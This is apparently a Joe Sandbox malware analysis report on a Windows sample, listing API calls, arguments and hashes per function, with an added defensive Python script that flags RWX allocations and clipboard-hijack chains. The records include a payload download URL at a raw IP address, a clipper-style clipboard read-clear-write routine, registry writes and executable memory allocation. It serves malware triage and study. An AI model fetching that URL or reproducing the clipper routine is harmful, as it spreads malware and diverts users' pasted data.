• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
• Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Control-flow Graph: function 434755-4347d2, calls 439921, SetFilePointerEx, GetLastError, 42ea93 and 42eac9 (rendered graph and executed/not-executed legend omitted)
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
• GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
• __dosmaperr.LIBCMT ref: 0043479F
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
• Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Control-flow Graph: function 402bad-402c03, calls RegCreateKeyExW, RegSetValueExW and RegCloseKey (rendered graph and executed/not-executed legend omitted)
APIs
• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
• Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Control-flow Graph: function 42e074-42e0ca, calls 431f5e, ExitThread, 4354f6, CloseHandle and FreeLibraryAndExitThread (rendered graph and executed/not-executed legend omitted)
APIs
  • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
  • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
  • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
• ExitThread.KERNEL32 ref: 0042E086
• CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
• FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
• String ID:
• API String ID: 1198197534-0
• Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
• Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Control-flow Graph: function 40239e-40256e, calls PostQuitMessage, DefWindowProcW, 401da4, 4010ba and 4029f4 (rendered graph and executed/not-executed legend omitted)
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
• PostQuitMessage.USER32(00000000), ref: 00402563
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: MessagePostProcQuitWindow
• String ID:
• API String ID: 3873111417-0
• Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
• Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Control-flow Graph: function 40155a-4016d9, calls Sleep and 4010ba (rendered graph and executed/not-executed legend omitted)
APIs
• Sleep.KERNEL32(00001D1B), ref: 00401562
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _wcslen$Sleep
• String ID: http://176.113.115.19/ScreenUpdateSync.exe
• API String ID: 3358372957-3120454669
• Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
• Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
• Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
• Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
APIs
• _wcslen.LIBCMT ref: 0040298F
• __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                              • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2843524283-0
                                                                                                                                                                                                                                            • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                            • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                            • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                            • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                            • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 323602529-0
                                                                                                                                                                                                                                            • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                            • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                                                                                                                            • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                            • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                            • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                            • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
• Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
APIs
• RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
• Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
• Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
• Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
• Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
• Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B09FDE
Memory Dump Source
• Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 4cf59bb0d1ce78d9132d7d57d63f9df41f8c1896ad0a5d94ad3c6abc69f942b2
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: F6112B79A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B362D771EA50EB81
APIs
• __EH_prolog3_GS.LIBCMT ref: 0249194D
• Sleep.KERNEL32(00001541), ref: 02491957
  • Part of subcall function 0249CE77: _strlen.LIBCMT ref: 0249CE8E
• OpenClipboard.USER32(00000000), ref: 02491984
• GetClipboardData.USER32(00000001), ref: 02491994
• _strlen.LIBCMT ref: 024919B0
• _strlen.LIBCMT ref: 024919DF
• _strlen.LIBCMT ref: 02491B23
• EmptyClipboard.USER32 ref: 02491B39
• GlobalAlloc.KERNEL32(00000002,00000001), ref: 02491B46
• GlobalUnlock.KERNEL32(00000000), ref: 02491B70
• SetClipboardData.USER32(00000001,00000000), ref: 02491B79
• GlobalFree.KERNEL32(00000000), ref: 02491B80
• CloseClipboard.USER32 ref: 02491BA4
• Sleep.KERNEL32(000002D2), ref: 02491BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: 4#E$i
• API String ID: 4246938166-2480119546
• Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction ID: 63606adb81ef75338f9e99fff924674b777f75d393eb677b34fe5072a0c14ace
• Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction Fuzzy Hash: 47512630C00395DADB11DFA4ED55BED7B74FF2A306F04522AD809A2172EB709681CB69
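Triage note with an added example (Python written for this page, not Joe Sandbox code or code from the sample). Two of the records above carry most of the signal: the VirtualAlloc.KERNEL32(00000000,?,00001000,00000040) call at 00B09FDE requests MEM_COMMIT (0x1000) with PAGE_EXECUTE_READWRITE (0x40) from a dump that the report marks "based on PE: false", i.e. an RWX allocation made by code that is not backed by any mapped image; and the OpenClipboard, GetClipboardData(1), EmptyClipboard, GlobalAlloc, SetClipboardData(1, ...), CloseClipboard chain at 02491984..02491BA4 reads the clipboard as CF_TEXT (format 1), clears it and writes a new CF_TEXT value, with Sleep(0x1541) = 5441 ms before and Sleep(0x2D2) = 722 ms after, which is the read-modify-write shape of a clipper. The script parses records in this listing's own "APIs" format and flags both. REPORT_SNIPPET is copied from the records above (trimmed, with the GDI window-painting function kept as a negative control); the ordered-subsequence rule, the in_pe flag and the CF_NAMES table are this example's own choices, and the numeric constants are the Windows SDK values.

```python
# Added triage helper (not Joe Sandbox code): parse "APIs" records from this listing
# and flag RWX allocations, clipboard read-modify-write chains and unbacked code.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Records copied from the listing above (trimmed); the GDI function is a negative control.
REPORT_SNIPPET = """\
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B09FDE
Memory Dump Source
• Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
APIs
• __EH_prolog3_GS.LIBCMT ref: 0249194D
• Sleep.KERNEL32(00001541), ref: 02491957
  • Part of subcall function 0249CE77: _strlen.LIBCMT ref: 0249CE8E
• OpenClipboard.USER32(00000000), ref: 02491984
• GetClipboardData.USER32(00000001), ref: 02491994
• _strlen.LIBCMT ref: 024919B0
• EmptyClipboard.USER32 ref: 02491B39
• GlobalAlloc.KERNEL32(00000002,00000001), ref: 02491B46
• SetClipboardData.USER32(00000001,00000000), ref: 02491B79
• CloseClipboard.USER32 ref: 02491BA4
• Sleep.KERNEL32(000002D2), ref: 02491BAF
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
APIs
• NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0249239C
• CreateSolidBrush.GDI32(00646464), ref: 024923CB
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
"""

# "• Api.MODULE(arg,arg), ref: ADDR"; the argument list is optional in this format.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SOURCE_RE = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)

MEM_COMMIT = 0x1000                 # Windows SDK values
PAGE_EXECUTE_READWRITE = 0x40
CF_NAMES = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
# Example's own rule: these must appear in this order for a read-modify-write verdict.
CLIPPER_SEQUENCE = ("OpenClipboard", "GetClipboardData", "EmptyClipboard",
                    "SetClipboardData", "CloseClipboard")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]      # raw hex strings; "?" means the sandbox could not resolve it
    ref: int


@dataclass
class FunctionReport:
    first_ref: int = 0
    in_pe: bool = True   # False when the dump is "based on PE: false" (unbacked code)
    calls: List[Call] = field(default_factory=list)
    rwx_alloc_refs: List[int] = field(default_factory=list)
    clipboard_hijack: bool = False
    clipboard_format: Optional[str] = None
    sleeps_ms: List[int] = field(default_factory=list)


def arg_int(args, index):
    """Argument `index` as int, or None when absent or unresolved ("?")."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def parse_functions(text):
    """One FunctionReport per 'APIs' header; subcall lines belong to other functions."""
    reports, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionReport()
            reports.append(current)
            continue
        if current is None or "Part of subcall function" in line:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            call = Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
            if not current.calls:
                current.first_ref = call.ref
            current.calls.append(call)
            continue
        s = SOURCE_RE.search(line)
        if s:
            current.in_pe = s.group(1).lower() == "true"
    return reports


def is_ordered_subsequence(needle, haystack):
    pos = 0
    for item in haystack:
        if pos < len(needle) and item == needle[pos]:
            pos += 1
    return pos == len(needle)


def analyze(text):
    reports = parse_functions(text)
    for r in reports:
        for c in r.calls:
            if c.api == "VirtualAlloc":   # (lpAddress, dwSize, flAllocationType, flProtect)
                alloc_type, protect = arg_int(c.args, 2), arg_int(c.args, 3)
                if protect == PAGE_EXECUTE_READWRITE and alloc_type is not None \
                        and alloc_type & MEM_COMMIT:
                    r.rwx_alloc_refs.append(c.ref)
            elif c.api == "Sleep":
                ms = arg_int(c.args, 0)
                if ms is not None:
                    r.sleeps_ms.append(ms)
        if is_ordered_subsequence(CLIPPER_SEQUENCE, [c.api for c in r.calls]):
            r.clipboard_hijack = True
            fmt = next((arg_int(c.args, 0) for c in r.calls if c.api == "SetClipboardData"), None)
            if fmt is not None:
                r.clipboard_format = CF_NAMES.get(fmt, hex(fmt))
    return reports


if __name__ == "__main__":
    for r in analyze(REPORT_SNIPPET):
        print(f"{r.first_ref:08X} in_pe={r.in_pe} rwx={[f'{x:08X}' for x in r.rwx_alloc_refs]} "
              f"clipper={r.clipboard_hijack} fmt={r.clipboard_format} sleeps_ms={r.sleeps_ms}")
```

Listing order is used as a stand-in for control flow, so the verdict is a triage hint and not proof of a loop; a function that only opens, reads and closes the clipboard (a pure reader) is not flagged because EmptyClipboard and SetClipboardData are missing, and an argument the sandbox shows as ? is treated as unknown rather than as zero, so an unresolved flProtect never produces an RWX finding.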
APIs
• NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0249239C
• GetClientRect.USER32(?,?), ref: 024923B1
• GetDC.USER32(?), ref: 024923B8
• CreateSolidBrush.GDI32(00646464), ref: 024923CB
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024923EA
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0249240B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 02492416
• MulDiv.KERNEL32(00000008,00000000), ref: 0249241F
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02492443
• SetBkMode.GDI32(?,00000001), ref: 024924CE
• _wcslen.LIBCMT ref: 024924E6
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
• String ID:
• API String ID: 1529870607-0
• Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
• Instruction ID: ddf4940b38fe77233b829d96e5e93ea08edf75a94bad4dbe5da1f3de282c151b
• Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
• Instruction Fuzzy Hash: 2171FC72900228AFDB229F64DD85FAEBBBCEF09711F0041A5B509E6151DA70AF85CF20
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
